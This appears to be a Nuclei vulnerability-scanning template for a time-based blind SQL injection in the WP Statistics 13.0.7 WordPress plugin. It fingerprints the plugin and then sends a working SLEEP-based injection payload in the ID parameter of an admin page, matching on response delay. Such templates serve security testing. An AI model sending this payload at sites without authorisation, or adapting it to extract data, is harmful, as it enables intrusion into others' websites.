wp-statistics-sqli: WordPress WP Statistics Plugin 13.0.7 - SQL Injection

id: wp-statistics-sqli

info:
  name: WordPress WP Statistics Plugin 13.0.7 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    WordPress Plugin WP Statistics 13.0.7  contains an unauthenticated Time based SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.exploit-db.com/exploits/49894
    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-statistics-sql-injection-13-0-7/
    - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
    - https://wordpress.org/plugins/wp-statistics/
  classification:
    cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: veronalabs
    product: wp_statistics
    publicwww-query: /wp-content/plugins/wp-statistics/
  tags: time-based-sqli,sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - 'WP Statistics'
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET /wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(7))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 500'
        condition: and
# digest: 4a0a00473045022003bbc9b9e1ca7e1dd3f9c0f40bfc96aa59e5b4d0c19b014c1e7db8c76b625905022100881259959e9954416b9585a80882df0ae4075e9a55e90b5a5f6e1d250ba7183e:922c64590222798bb761d5b6d8e72950